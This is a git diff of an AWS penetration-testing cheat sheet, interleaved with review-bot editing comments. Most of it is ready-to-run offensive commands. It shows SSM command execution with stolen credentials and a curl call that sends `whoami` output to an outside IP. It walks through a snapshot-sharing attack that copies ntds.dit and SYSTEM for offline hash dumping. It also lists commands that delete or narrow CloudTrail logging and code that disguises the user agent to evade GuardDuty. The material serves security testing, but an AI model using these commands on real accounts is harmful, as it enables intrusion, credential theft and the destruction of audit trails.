Select the instance from the instance text box as shown below : `attach ebs volume` -```powershell -aws ec2 create-volume –snapshot-id snapshot_id --availability-zone zone -aws ec2 attach-volume –-volume-id volume_id –-instance-id instance_id --device device -``` -4. Now, login to your ec2 instance and list the available disks using the following command : `lsblk` -5. Check if the volume has any data using the following command : `sudo file -s /dev/xvdf` -6. Format the volume to ext4 filesystem using the following command : `sudo mkfs -t ext4 /dev/xvdf` -7. Create a directory of your choice to mount our new ext4 volume. I am using the name “newvolume” : `sudo mkdir /newvolume` -8. Mount the volume to "newvolume" directory using the following command : `sudo mount /dev/xvdf /newvolume/` -9. cd into newvolume directory and check the disk space for confirming the volume mount : `cd /newvolume; df -h .` - - -## AWS - Copy EC2 using AMI Image - -First you need to extract data about the current instances and their AMI/security groups/subnet : `aws ec2 describe-images --region eu-west-1` - -```powershell -# create a new image for the instance-id -$ aws ec2 create-image --instance-id i-0438b003d81cd7ec5 --name "AWS Audit" --description "Export AMI" --region eu-west-1 - -# add key to AWS -$ aws ec2 import-key-pair --key-name "AWS Audit" --public-key-material file://~/.ssh/id_rsa.pub --region eu-west-1 - -# create ec2 using the previously created AMI, use the same security group and subnet to connect easily. 
-$ aws ec2 run-instances --image-id ami-0b77e2d906b00202d --security-group-ids "sg-6d0d7f01" --subnet-id subnet-9eb001ea --count 1 --instance-type t2.micro --key-name "AWS Audit" --query "Instances[0].InstanceId" --region eu-west-1 - -# now you can check the instance -aws ec2 describe-instances --instance-ids i-0546910a0c18725a1 - -# If needed : edit groups -aws ec2 modify-instance-attribute --instance-id "i-0546910a0c18725a1" --groups "sg-6d0d7f01" --region eu-west-1 - -# be a good guy, clean our instance to avoid any useless cost -aws ec2 stop-instances --instance-id "i-0546910a0c18725a1" --region eu-west-1 -aws ec2 terminate-instances --instance-id "i-0546910a0c18725a1" --region eu-west-1 -``` - -## AWS - Instance Connect - Push an SSH key to EC2 instance - -```powershell -# https://aws.amazon.com/fr/blogs/compute/new-using-amazon-ec2-instance-connect-for-ssh-access-to-your-ec2-instances/ -$ aws ec2 describe-instances --profile uploadcreds --region eu-west-1 | jq ".[][].Instances | .[] | {InstanceId, KeyName, State}" -$ aws ec2-instance-connect send-ssh-public-key --region us-east-1 --instance-id INSTANCE --availability-zone us-east-1d --instance-os-user ubuntu --ssh-public-key file://shortkey.pub --profile uploadcreds -``` - -## AWS - Lambda - Extract function's code - -```powershell -# https://blog.appsecco.com/getting-shell-and-data-access-in-aws-by-chaining-vulnerabilities-7630fa57c7ed -$ aws lambda list-functions --profile uploadcreds -$ aws lambda get-function --function-name "LAMBDA-NAME-HERE-FROM-PREVIOUS-QUERY" --query 'Code.Location' --profile uploadcreds -$ wget -O lambda-function.zip url-from-previous-query --profile uploadcreds -``` - -## AWS - SSM - Command execution - -:warning: The ssm-user account is not removed from the system when SSM Agent is uninstalled. 
- -SSM Agent is preinstalled, by default, on the following Amazon Machine Images (AMIs): -* Windows Server 2008-2012 R2 AMIs published in November 2016 or later -* Windows Server 2016 and 2019 -* Amazon Linux -* Amazon Linux 2 -* Ubuntu Server 16.04 -* Ubuntu Server 18.04 -* Amazon ECS-Optimized - -```powershell -$ aws ssm describe-instance-information --profile stolencreds --region eu-west-1 -$ aws ssm send-command --instance-ids "INSTANCE-ID-HERE" --document-name "AWS-RunShellScript" --comment "IP Config" --parameters commands=ifconfig --output text --query "Command.CommandId" --profile stolencreds -$ aws ssm list-command-invocations --command-id "COMMAND-ID-HERE" --details --query "CommandInvocations[].CommandPlugins[].{Status:Status,Output:Output}" --profile stolencreds - -e.g: -$ aws ssm send-command --instance-ids "i-05b████████adaa" --document-name "AWS-RunShellScript" --comment "whoami" --parameters commands='curl 162.243.███.███:8080/`whoami`' --output text --region=us-east-1 -``` ## AWS - Golden SAML Attack 
@@ -632,138 +140,6 @@ $ python .\shimit.py -idp http://adfs.lab.local/adfs/services/trust -pk key_file -u domain\admin -n admin@domain.com -r ADFS-admin -r ADFS-monitor -id 123456789012 ``` -## AWS - Shadow Copy attack - -Prerequisite: -* EC2:CreateSnapshot -* CloudCopy - https://github.com/Static-Flow/CloudCopy - -1. Load AWS CLI with Victim Credentials that have at least CreateSnapshot permissions -2. Run `"Describe-Instances"` and show in list for attacker to select -3. Run `"Create-Snapshot"` on volume of selected instance -4. Run `"modify-snapshot-attribute"` on new snapshot to set `"createVolumePermission"` to attacker AWS Account -5. Load AWS CLI with Attacker Credentials -6. Run `"run-instance"` command to create new linux ec2 with our stolen snapshot -7. Ssh run `"sudo mkdir /windows"` -8. Ssh run `"sudo mount /dev/xvdf1 /windows/"` -9. Ssh run `"sudo cp /windows/Windows/NTDS/ntds.dit /home/ec2-user"` -10. Ssh run `"sudo cp /windows/Windows/System32/config/SYSTEM /home/ec2-user"` -11. Ssh run `"sudo chown ec2-user:ec2-user /home/ec2-user/*"` -12. SFTP get `"/home/ec2-user/SYSTEM ./SYSTEM"` -13. SFTP get `"/home/ec2-user/ntds.dit ./ntds.dit"` -14. locally run `"secretsdump.py -system ./SYSTEM -ntds ./ntds.dit local -outputfile secrets'`, expects secretsdump to be on path - -## Disable CloudTrail - -```powershell -$ aws cloudtrail delete-trail --name cloudgoat_trail --profile administrator -``` - -Disable monitoring of events from global services - -```powershell -$ aws cloudtrail update-trail --name cloudgoat_trail --no-include-global-service-event -``` - -Disable Cloud Trail on specific regions - -```powershell -$ aws cloudtrail update-trail --name cloudgoat_trail --no-include-global-service-event --no-is-multi-region --region=eu-west -``` - -## Cover tracks by obfuscating Cloudtrail logs and Guard Duty - -:warning: When using awscli on Kali Linux, Pentoo and Parrot Linux, a log is generated based on the user-agent. 
- -Pacu bypass this problem by defining a custom User-Agent (https://github.com/RhinoSecurityLabs/pacu/blob/master/pacu.py#L1473) - -```python -boto3_session = boto3.session.Session() -ua = boto3_session._session.user_agent() -if 'kali' in ua.lower() or 'parrot' in ua.lower() or 'pentoo' in ua.lower(): # If the local OS is Kali/Parrot/Pentoo Linux - # GuardDuty triggers a finding around API calls made from Kali Linux, so let's avoid that... - self.print('Detected environment as one of Kali/Parrot/Pentoo Linux. Modifying user agent to hide that from GuardDuty...') -``` - -## DynamoDB -> Amazon DynamoDB is a key-value and document database that delivers single-digit millisecond performance at any scale. It's a fully managed, multi-region, multi-active, durable database with built-in security, backup and restore, and in-memory caching for internet-scale applications. DynamoDB can handle more than 10 trillion requests per day and can support peaks of more than 20 million requests per second. 
- -* list tables -```bash -$ aws --endpoint-url http://s3.bucket.htb dynamodb list-tables - -{ - "TableNames": [ - "users" - ] -} -``` - -* enumerate table content -```bash -$ aws --endpoint-url http://s3.bucket.htb dynamodb scan --table-name users | jq -r '.Items[]' - -{ - "password": { - "S": "Management@#1@#" - }, - "username": { - "S": "Mgmt" - } -} -``` - -## Security checks - -Security checks from [DenizParlak/Zeus: AWS Auditing & Hardening Tool](https://github.com/DenizParlak/Zeus) - -* Identity and Access Management - * Avoid the use of the "root" account - * Ensure multi-factor authentication (MFA) is enabled for all IAM users that have a console password - * Ensure credentials unused for 90 days or greater are disabled - * Ensure access keys are rotated every 90 days or less - * Ensure IAM password policy requires at least one uppercase letter - * Ensure IAM password policy requires at least one lowercase letter - * Ensure IAM password policy requires at least one symbol - * Ensure IAM password policy requires at least one number - * Ensure IAM password policy requires minimum length of 14 or greater - * Ensure no root account access key exists - * Ensure MFA is enabled for the "root" account - * Ensure security questions are registered in the AWS account - * Ensure IAM policies are attached only to groups or role - * Enable detailed billing - * Maintain current contact details - * Ensure security contact information is registered - * Ensure IAM instance roles are used for AWS resource access from instances -* Logging - * Ensure CloudTrail is enabled in all regions - * Ensure CloudTrail log file validation is enabled - * Ensure the S3 bucket CloudTrail logs to is not publicly accessible - * Ensure CloudTrail trails are integrated with CloudWatch Logs - * Ensure AWS Config is enabled in all regions - * Ensure S3 bucket access logging is enabled on the CloudTrail S3 bucket - * Ensure CloudTrail logs are encrypted at rest using KMS CMKs - * Ensure rotation 
for customer created CMKs is enabled -* Networking - * Ensure no security groups allow ingress from 0.0.0.0/0 to port 22 - * Ensure no security groups allow ingress from 0.0.0.0/0 to port 3389 - * Ensure VPC flow logging is enabled in all VPC - * Ensure the default security group of every VPC restricts all traffic -* Monitoring - * Ensure a log metric filter and alarm exist for unauthorized API calls - * Ensure a log metric filter and alarm exist for Management Consolesign-in without MFA - * Ensure a log metric filter and alarm exist for usage of "root" account - * Ensure a log metric filter and alarm exist for IAM policy changes - * Ensure a log metric filter and alarm exist for CloudTrail configuration changes - * Ensure a log metric filter and alarm exist for AWS Management Console authentication failures - * Ensure a log metric filter and alarm exist for disabling or scheduled deletion of customer created CMKs - * Ensure a log metric filter and alarm exist for S3 bucket policy changes - * Ensure a log metric filter and alarm exist for AWS Config configuration changes - * Ensure a log metric filter and alarm exist for security group changes - * Ensure a log metric filter and alarm exist for changes to NetworkAccess Control Lists (NACL) - * Ensure a log metric filter and alarm exist for changes to network gateways - * Ensure a log metric filter and alarm exist for route table changes - * Ensure a log metric filter and alarm exist for VPC changes ## AWSome Pentesting Cheatsheet 
@@ -2391,20 +1767,14 @@ aws ec2 describe-instances --filters "Name=subnet-id,Values=ID" ## References -* [An introduction to penetration testing AWS - Akimbocore](https://akimbocore.com/article/introduction-to-penetration-testing-aws/) * [Cloud Shadow Admin Threat 10 Permissions Protect - CyberArk](https://www.cyberark.com/threat-research-blog/cloud-shadow-admin-threat-10-permissions-protect/) * [My arsenal of AWS Security tools - toniblyx](https://github.com/toniblyx/my-arsenal-of-aws-security-tools) * [AWS Privilege Escalation method mitigation - RhinoSecurityLabs](https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/) * [AWS CLI Cheatsheet - apolloclark](https://gist.github.com/apolloclark/b3f60c1f68aa972d324b) * [Pacu Open source AWS Exploitation framework - RhinoSecurityLabs](https://rhinosecuritylabs.com/aws/pacu-open-source-aws-exploitation-framework/) * [PACU Spencer Gietzen - 30 juil. 2018](https://www.youtube.com/watch?v=XfetW1Vqybw&feature=youtu.be&list=PLBID4NiuWSmfdWCmYGDQtlPABFHN7HyD5) -* [Cloud security instance metadata - PumaScan](https://pumascan.com/resources/cloud-security-instance-metadata/) * [Privilege escalation in the Cloud: From SSRF to Global Account Administrator - Maxime Leblanc - Sep 1, 2018](https://medium.com/poka-techblog/privilege-escalation-in-the-cloud-from-ssrf-to-global-account-administrator-fd943cf5a2f6) * [AWS - Cheatsheet - @Magnussen](https://www.magnussen.funcmylife.fr/article_35) -* [HOW I HACKED A WHOLE EC2 NETWORK DURING A PENETRATION TEST - by Federico Fernandez](https://www.secsignal.org/en/news/how-i-hacked-a-whole-ec2-network-during-a-penetration-test/) -* [How to Attach and Mount an EBS volume to EC2 Linux Instance - AUGUST 17, 2016](https://devopscube.com/mount-ebs-volume-ec2-instance/) * [Getting shell and data access in AWS by chaining vulnerabilities - Riyaz Walikar - Aug 29, 2019 ](https://blog.appsecco.com/getting-shell-and-data-access-in-aws-by-chaining-vulnerabilities-7630fa57c7ed) 
* [Getting started with Version 2 of AWS EC2 Instance Metadata service (IMDSv2) - Sunesh Govindaraj - Nov 25, 2019](https://blog.appsecco.com/getting-started-with-version-2-of-aws-ec2-instance-metadata-service-imdsv2-2ad03a1f3650) -* [Gaining AWS Console Access via API Keys - Ian Williams - March 18th, 2020](https://blog.netspi.com/gaining-aws-console-access-via-api-keys/) -* [AWS API calls that return credentials - kmcquade](https://gist.github.com/kmcquade/33860a617e651104d243c324ddf7992a) -* [A short note on AWS KEY ID - Tal Be'ery - Oct 27, 2023](https://medium.com/@TalBeerySec/a-short-note-on-aws-key-id-f88cc4317489) +* [Gaining AWS Console Access via API Keys - Ian Williams - March 18th, 2020](https://blog.netspi.com/gaining-aws-console-access-via-api-keys/) \ No newline at end of file diff --git a/docs/cloud/aws/aws-access-token.md b/docs/cloud/aws/aws-access-token.md new file mode 100644 index 0000000..b7bc0cb --- /dev/null +++ b/docs/cloud/aws/aws-access-token.md 
@@ -0,0 +1,85 @@ +# AWS - Access Token & Secrets + +## URL Services + +| Service | URL | +|--------------|-----------------------| +| s3 | https://{user_provided}.s3.amazonaws.com | +| cloudfront | https://{random_id}.cloudfront.net | +| ec2 | ec2-{ip-seperated}.compute-1.amazonaws.com | +| es | https://{user_provided}-{random_id}.{region}.es.amazonaws.com | +| elb | http://{user_provided}-{random_id}.{region}.elb.amazonaws.com:80/443 | +| elbv2 | https://{user_provided}-{random_id}.{region}.elb.amazonaws.com | +| rds | mysql://{user_provided}.{random_id}.{region}.rds.amazonaws.com:3306 | +| rds | postgres://{user_provided}.{random_id}.{region}.rds.amazonaws.com:5432 | +| route 53 | {user_provided} | +| execute-api | https://{random_id}.execute-api.{region}.amazonaws.com/{user_provided} | +| cloudsearch | https://doc-{user_provided}-{random_id}.{region}.cloudsearch.amazonaws.com | +| transfer | sftp://s-{random_id}.server.transfer.{region}.amazonaws.com | +| iot | mqtt://{random_id}.iot.{region}.amazonaws.com:8883 | +| iot | https://{random_id}.iot.{region}.amazonaws.com:8443 | +| iot | https://{random_id}.iot.{region}.amazonaws.com:443 | +| mq | https://b-{random_id}-{1,2}.mq.{region}.amazonaws.com:8162 | +| mq | ssl://b-{random_id}-{1,2}.mq.{region}.amazonaws.com:61617 | +| kafka | b-{1,2,3,4}.{user_provided}.{random_id}.c{1,2}.kafka.{region}.amazonaws.com | +| kafka | {user_provided}.{random_id}.c{1,2}.kafka.useast-1.amazonaws.com | +| cloud9 | https://{random_id}.vfs.cloud9.{region}.amazonaws.com | +| mediastore | https://{random_id}.data.mediastore.{region}.amazonaws.com | +| kinesisvideo | https://{random_id}.kinesisvideo.{region}.amazonaws.com | +| mediaconvert | https://{random_id}.mediaconvert.{region}.amazonaws.com | +| mediapackage | https://{random_id}.mediapackage.{region}.amazonaws.com/in/v1/{random_id}/channel | + + +## Access Key ID & Secret + +IAM uses the following prefixes to indicate what type of resource each unique ID applies to. 
The first four characters are the prefix that depends on the type of the key. + +| Prefix | Resource type | +|--------------|-------------------------| +| ABIA | AWS STS service bearer token | +| ACCA | Context-specific credential | +| AGPA | User group | +| AIDA | IAM user | +| AIPA | Amazon EC2 instance profile | +| AKIA | Access key | +| ANPA | Managed policy | +| ANVA | Version in a managed policy | +| APKA | Public key | +| AROA | Role | +| ASCA | Certificate | +| ASIA | Temporary (AWS STS) access key | + +The rest of the string is Base32 encoded and can be used to recover the account id. + +```py +import base64 +import binascii + +def AWSAccount_from_AWSKeyID(AWSKeyID): + + trimmed_AWSKeyID = AWSKeyID[4:] #remove KeyID prefix + x = base64.b32decode(trimmed_AWSKeyID) #base32 decode + y = x[0:6] + + z = int.from_bytes(y, byteorder='big', signed=False) + mask = int.from_bytes(binascii.unhexlify(b'7fffffffff80'), byteorder='big', signed=False) + + e = (z & mask)>>7 + return (e) + + +print ("account id:" + "{:012d}".format(AWSAccount_from_AWSKeyID("ASIAQNZGKIQY56JQ7WML"))) +``` + +## Regions + +* US Standard - http://s3.amazonaws.com +* Ireland - http://s3-eu-west-1.amazonaws.com +* Northern California - http://s3-us-west-1.amazonaws.com +* Singapore - http://s3-ap-southeast-1.amazonaws.com +* Tokyo - http://s3-ap-northeast-1.amazonaws.com + + +## References + +* [A short note on AWS KEY ID - Tal Be'ery - Oct 27, 2023](https://medium.com/@TalBeerySec/a-short-note-on-aws-key-id-f88cc4317489) diff --git a/docs/cloud/aws/aws-cognito.md b/docs/cloud/aws/aws-cognito.md new file mode 100644 index 0000000..25064b4 --- /dev/null +++ b/docs/cloud/aws/aws-cognito.md 
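Review bot: `AWSAccount_from_AWSKeyID` raises a bare `binascii.Error` on any input that is not a well-formed key ID (wrong length, lowercase, non-base32 characters) and returns a meaningless number for a 20-character string whose prefix is not an access key, so a guard before the decode such as `if len(AWSKeyID) != 20 or AWSKeyID[:4] not in ("AKIA", "ASIA"): raise ValueError("expected a 20-character AKIA/ASIA access key ID")` would make the snippet safe to reuse. The constant `7fffffffff80` deserves a comment: it clears the top bit and the low seven bits of the 48-bit value built from the first six decoded bytes, and the following `>>7` leaves the 40-bit number that is printed as the 12-digit account id. The prefix table lists every IAM unique-ID type, but the referenced note only establishes the decode for access key IDs, so a one-line remark that the function is meant for AKIA/ASIA values would stop readers feeding it role or user IDs. In the URL table, `{ip-seperated}` is a typo for `separated`.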
@@ -0,0 +1,17 @@
+# AWS - Cognito
+
+* [Cognito Scanner](https://github.com/padok-team/cognito-scanner) - A CLI tool for executing attacks on cognito such as *Unwanted account creation*, *Account Oracle* and *Identity Pool escalation*.
+ ```bash
+ # Installation
+ $ pip install cognito-scanner
+ # Usage
+ $ cognito-scanner --help
+ # Get information about how to use the unwanted account creation script
+ $ cognito-scanner account-creation --help
+ # For more details go to https://github.com/padok-team/cognito-scanner
+ ```
+
+
+## References
+
+* []()
\ No newline at end of file
diff --git a/docs/cloud/aws/aws-dynamodb.md b/docs/cloud/aws/aws-dynamodb.md
new file mode 100644
index 0000000..50934f8
--- /dev/null
+++ b/docs/cloud/aws/aws-dynamodb.md
@@ -0,0 +1,36 @@
+# AWS - DynamoDB
+
+> Amazon DynamoDB is a key-value and document database that delivers single-digit millisecond performance at any scale. It's a fully managed, multi-region, multi-active, durable database with built-in security, backup and restore, and in-memory caching for internet-scale applications. DynamoDB can handle more than 10 trillion requests per day and can support peaks of more than 20 million requests per second.
+
+
+## List Tables
+
+```bash
+$ aws --endpoint-url http://s3.bucket.htb dynamodb list-tables
+
+{
+ "TableNames": [
+ "users"
+ ]
+}
+```
+
+## Enumerate Table Content
+
+```bash
+$ aws --endpoint-url http://s3.bucket.htb dynamodb scan --table-name users | jq -r '.Items[]'
+
+{
+ "password": {
+ "S": "Management@#1@#"
+ },
+ "username": {
+ "S": "Mgmt"
+ }
+}
+```
+
+
+## References
+
+* []()
\ No newline at end of file
diff --git a/docs/cloud/aws/aws-ec2.md b/docs/cloud/aws/aws-ec2.md
new file mode 100644
index 0000000..7d0289b
--- /dev/null
+++ b/docs/cloud/aws/aws-ec2.md
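Review bot: The References sections of both new files in this line, aws-cognito.md and aws-dynamodb.md, end with an empty placeholder link `* []()`, which renders as a stray bullet; either fill it in (the Cognito page already cites padok-team/cognito-scanner) or leave the heading out until there is a reference. In aws-dynamodb.md the `--endpoint-url http://s3.bucket.htb` examples come from a lab host, and a short remark such as `# endpoint is lab-specific; a real account uses the regional DynamoDB endpoint` would stop readers copying it verbatim. The leading `$ ` in the fenced blocks also breaks copy-paste, which the other new pages avoid in places (see aws-lambda.md).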
@@ -0,0 +1,89 @@ +# AWS - EC2 + +* [dufflebag](https://labs.bishopfox.com/dufflebag) - Find secrets that are accidentally exposed via Amazon EBS's "public" mode + + +## Copy EC2 using AMI Image + +First you need to extract data about the current instances and their AMI/security groups/subnet : `aws ec2 describe-images --region eu-west-1` + +```powershell +# create a new image for the instance-id +$ aws ec2 create-image --instance-id i-0438b003d81cd7ec5 --name "AWS Audit" --description "Export AMI" --region eu-west-1 + +# add key to AWS +$ aws ec2 import-key-pair --key-name "AWS Audit" --public-key-material file://~/.ssh/id_rsa.pub --region eu-west-1 + +# create ec2 using the previously created AMI, use the same security group and subnet to connect easily. +$ aws ec2 run-instances --image-id ami-0b77e2d906b00202d --security-group-ids "sg-6d0d7f01" --subnet-id subnet-9eb001ea --count 1 --instance-type t2.micro --key-name "AWS Audit" --query "Instances[0].InstanceId" --region eu-west-1 + +# now you can check the instance +aws ec2 describe-instances --instance-ids i-0546910a0c18725a1 + +# If needed : edit groups +aws ec2 modify-instance-attribute --instance-id "i-0546910a0c18725a1" --groups "sg-6d0d7f01" --region eu-west-1 + +# be a good guy, clean our instance to avoid any useless cost +aws ec2 stop-instances --instance-id "i-0546910a0c18725a1" --region eu-west-1 +aws ec2 terminate-instances --instance-id "i-0546910a0c18725a1" --region eu-west-1 +``` + + +## Mount EBS volume to EC2 Linux + +:warning: EBS snapshots are block-level incremental, which means that every snapshot only copies the blocks (or areas) in the volume that had been changed since the last snapshot. To restore your data, you need to create a new EBS volume from one of your EBS snapshots. The new volume will be a duplicate of the initial EBS volume on which the snapshot was taken. + +1. Head over to EC2 –> Volumes and create a new volume of your preferred size and type. +2. 
Select the created volume, right click and select the "attach volume" option. +3. Select the instance from the instance text box as shown below : `attach ebs volume` + ```powershell + aws ec2 create-volume –snapshot-id snapshot_id --availability-zone zone + aws ec2 attach-volume –-volume-id volume_id –-instance-id instance_id --device device + ``` +4. Now, login to your ec2 instance and list the available disks using the following command : `lsblk` +5. Check if the volume has any data using the following command : `sudo file -s /dev/xvdf` +6. Format the volume to ext4 filesystem using the following command : `sudo mkfs -t ext4 /dev/xvdf` +7. Create a directory of your choice to mount our new ext4 volume. I am using the name “newvolume” : `sudo mkdir /newvolume` +8. Mount the volume to "newvolume" directory using the following command : `sudo mount /dev/xvdf /newvolume/` +9. cd into newvolume directory and check the disk space for confirming the volume mount : `cd /newvolume; df -h .` + + +## Shadow Copy attack + +**Requirements**: + +* EC2:CreateSnapshot +* [Static-Flow/CloudCopy](https://github.com/Static-Flow/CloudCopy) + +**Exploit**: + +1. Load AWS CLI with Victim Credentials that have at least CreateSnapshot permissions +2. Run `"Describe-Instances"` and show in list for attacker to select +3. Run `"Create-Snapshot"` on volume of selected instance +4. Run `"modify-snapshot-attribute"` on new snapshot to set `"createVolumePermission"` to attacker AWS Account +5. Load AWS CLI with Attacker Credentials +6. Run `"run-instance"` command to create new linux ec2 with our stolen snapshot +7. Ssh run `"sudo mkdir /windows"` +8. Ssh run `"sudo mount /dev/xvdf1 /windows/"` +9. Ssh run `"sudo cp /windows/Windows/NTDS/ntds.dit /home/ec2-user"` +10. Ssh run `"sudo cp /windows/Windows/System32/config/SYSTEM /home/ec2-user"` +11. Ssh run `"sudo chown ec2-user:ec2-user /home/ec2-user/*"` +12. SFTP get `"/home/ec2-user/SYSTEM ./SYSTEM"` +13. 
SFTP get `"/home/ec2-user/ntds.dit ./ntds.dit"` +14. locally run `"secretsdump.py -system ./SYSTEM -ntds ./ntds.dit local -outputfile secrets'`, expects secretsdump to be on path + + +## Instance Connect + +Push an SSH key to EC2 instance + +```powershell +# https://aws.amazon.com/fr/blogs/compute/new-using-amazon-ec2-instance-connect-for-ssh-access-to-your-ec2-instances/ +$ aws ec2 describe-instances --profile uploadcreds --region eu-west-1 | jq ".[][].Instances | .[] | {InstanceId, KeyName, State}" +$ aws ec2-instance-connect send-ssh-public-key --region us-east-1 --instance-id INSTANCE --availability-zone us-east-1d --instance-os-user ubuntu --ssh-public-key file://shortkey.pub --profile uploadcreds +``` + + +## References + +* [How to Attach and Mount an EBS volume to EC2 Linux Instance - AUGUST 17, 2016](https://devopscube.com/mount-ebs-volume-ec2-instance/) \ No newline at end of file diff --git a/docs/cloud/aws/aws-enumeration.md b/docs/cloud/aws/aws-enumeration.md new file mode 100644 index 0000000..3d21a8f --- /dev/null +++ b/docs/cloud/aws/aws-enumeration.md 
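Review bot: The two CLI lines in step 3 of "Mount EBS volume to EC2 Linux" use en-dashes (`–snapshot-id`, `–-volume-id`, `–-instance-id`) instead of `--`, so they fail as written; they should read `aws ec2 create-volume --snapshot-id snapshot_id --availability-zone zone` and `aws ec2 attach-volume --volume-id volume_id --instance-id instance_id --device device`. Step 6 formats the volume with `mkfs`, which destroys whatever a snapshot-backed volume held, so it is worth saying that the `file -s` check in step 5 is the decision point and formatting only applies to a blank volume. In step 14 of the Shadow Copy section the quoting is unbalanced (`"` opened, `'` closed). Since the page is a Requirements/Exploit layout, a detection line under Requirements noting that sharing a snapshot to another account in step 4 is recorded in CloudTrail as a `ModifySnapshotAttribute` event would balance it.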
@@ -0,0 +1,117 @@ +# AWS - Enumerate + +## Collectors + +* [nccgroup/ScoutSuite](https://github.com/nccgroup/ScoutSuite/wiki) - Multi-Cloud Security Auditing Tool + ```powershell + $ python scout.py PROVIDER --help + # The --session-token is optional and only used for temporary credentials (i.e. role assumption). + $ python scout.py aws --access-keys --access-key-id --secret-access-key --session-token + $ python scout.py azure --cli + ``` + +* [RhinoSecurityLabs/pacu](https://github.com/RhinoSecurityLabs/pacu) - Exploit configuration flaws within an AWS environment using an extensible collection of modules with a diverse feature-set + ```powershell + $ bash install.sh + $ python3 pacu.py + set_keys/swap_keys + run [--keyword-arguments] + run --regions eu-west-1,us-west-1 + ``` + +* [salesforce/cloudsplaining](https://github.com/salesforce/cloudsplaining) - An AWS IAM Security Assessment tool that identifies violations of least privilege and generates a risk-prioritized report + ```powershell + $ pip3 install --user cloudsplaining + $ cloudsplaining download --profile myawsprofile + $ cloudsplaining scan --input-file default.json + ``` + +* [duo-labs/cloudmapper](https://github.com/duo-labs/cloudmapper) - CloudMapper helps you analyze your Amazon Web Services (AWS) environments + ```powershell + sudo apt-get install autoconf automake libtool python3.7-dev python3-tk jq awscli build-essential + pipenv install --skip-lock + pipenv shell + report: Generate HTML report. Includes summary of the accounts and audit findings. + iam_report: Generate HTML report for the IAM information of an account. + audit: Check for potential misconfigurations. + collect: Collect metadata about an account. 
+ find_admins: Look at IAM policies to identify admin users and roles, or principals with specific privileges + ``` + +* [cyberark/SkyArk](https://github.com/cyberark/SkyArk) - Discover the most privileged users in the scanned AWS environment, including the AWS Shadow Admins + ```powershell + $ powershell -ExecutionPolicy Bypass -NoProfile + PS C> Import-Module .\SkyArk.ps1 -force + PS C> Start-AWStealth + PS C> Scan-AWShadowAdmins + ``` + +* [BishopFox/CloudFox](https://github.com/BishopFox/CloudFox/) - Automating situational awareness for cloud penetration tests. Designed for white box enumeration (SecurityAudit/ReadOnly type permission), but can be used for black box (found credentials) as well. + ```ps1 + cloudfox aws --profile [profile-name] all-checks + ``` + +* [toniblyx/Prowler](https://github.com/toniblyx/prowler) - AWS security best practices assessments, audits, incident response, continuous monitoring, hardening and forensics readiness. It follows guidelines of the CIS Amazon Web Services Foundations Benchmark and DOZENS of additional checks including GDPR and HIPAA (+100). 
+ ```powershell + $ pip install awscli ansi2html detect-secrets + $ sudo apt install jq + $ ./prowler -E check42,check43 + $ ./prowler -p custom-profile -r us-east-1 -c check11 + $ ./prowler -A 123456789012 -R ProwlerRole + ``` + +* [nccgroup/PMapper](https://github.com/nccgroup/PMapper) - A tool for quickly evaluating IAM permissions in AWS + ```powershell + pip install principalmapper + pmapper graph --create + pmapper visualize --filetype png + pmapper analysis --output-type text + + # Determine if PowerUser can escalate privileges + pmapper query "preset privesc user/PowerUser" + pmapper argquery --principal user/PowerUser --preset privesc + + # Find all principals that can escalate privileges + pmapper query "preset privesc *" + pmapper argquery --principal '*' --preset privesc + + # Find all principals that PowerUser can access + pmapper query "preset connected user/PowerUser *" + pmapper argquery --principal user/PowerUser --resource '*' --preset connected + + # Find all principals that can access PowerUser + pmapper query "preset connected * user/PowerUser" + pmapper argquery --principal '*' --resource user/PowerUser --preset connected + ``` + + +## AWS - Enumerate IAM permissions + +Enumerate the permissions associated with AWS credential set with [andresriancho/enumerate-iam](https://github.com/andresriancho/enumerate-iam) + +```powershell +git clone git@github.com:andresriancho/enumerate-iam.git +pip install -r requirements.txt +./enumerate-iam.py --access-key AKIA... --secret-key StF0q... +2019-05-10 15:57:58,447 - 21345 - [INFO] Starting permission enumeration for access-key-id "AKIA..." +2019-05-10 15:58:01,532 - 21345 - [INFO] Run for the hills, get_account_authorization_details worked! +2019-05-10 15:58:01,537 - 21345 - [INFO] -- { + "RoleDetailList": [ + { + "Tags": [], + "AssumeRolePolicyDocument": { + "Version": "2008-10-17", + "Statement": [ + { +... +2019-05-10 15:58:26,709 - 21345 - [INFO] -- gamelift.list_builds() worked! 
+2019-05-10 15:58:26,850 - 21345 - [INFO] -- cloudformation.list_stack_sets() worked! +2019-05-10 15:58:26,982 - 21345 - [INFO] -- directconnect.describe_locations() worked! +2019-05-10 15:58:27,021 - 21345 - [INFO] -- gamelift.describe_matchmaking_rule_sets() worked! +2019-05-10 15:58:27,311 - 21345 - [INFO] -- sqs.list_queues() worked! +``` + + +## References + +* [An introduction to penetration testing AWS - Akimbocore - HollyGraceful - 06 August 2021](https://akimbocore.com/article/introduction-to-penetration-testing-aws/) \ No newline at end of file diff --git a/docs/cloud/aws/aws-ioc-detection.md b/docs/cloud/aws/aws-ioc-detection.md new file mode 100644 index 0000000..1131ef4 --- /dev/null +++ b/docs/cloud/aws/aws-ioc-detection.md 
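Review bot: In the enumerate-iam block, `git clone git@github.com:andresriancho/enumerate-iam.git` requires a GitHub SSH key and `pip install -r requirements.txt` runs before the cloned directory is entered, so the lines should be `git clone https://github.com/andresriancho/enumerate-iam.git`, `cd enumerate-iam`, then the pip install. The ScoutSuite line `python scout.py aws --access-keys --access-key-id --secret-access-key --session-token` has no placeholder values after the options, which leaves unclear which ones take arguments. The captured output shows the tool trying API after API until some succeed; each attempt lands in CloudTrail, the denied ones typically as `AccessDenied` errors, and a one-line note to that effect is the detection counterpart this section lacks.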
@@ -0,0 +1,38 @@
+# AWS - IOC & Detections
+
+## CloudTrail
+
+### Disable CloudTrail
+
+```powershell
+$ aws cloudtrail delete-trail --name cloudgoat_trail --profile administrator
+```
+
+Disable monitoring of events from global services
+
+```powershell
+$ aws cloudtrail update-trail --name cloudgoat_trail --no-include-global-service-event
+```
+
+Disable Cloud Trail on specific regions
+
+```powershell
+$ aws cloudtrail update-trail --name cloudgoat_trail --no-include-global-service-event --no-is-multi-region --region=eu-west
+```
+
+
+## GuardDuty
+
+### OS User Agent
+
+:warning: When using awscli on Kali Linux, Pentoo and Parrot Linux, a log is generated based on the user-agent.
+
+Pacu bypass this problem by defining a custom User-Agent: [pacu.py#L1473](https://github.com/RhinoSecurityLabs/pacu/blob/master/pacu.py#L1473)
+
+```python
+boto3_session = boto3.session.Session()
+ua = boto3_session._session.user_agent()
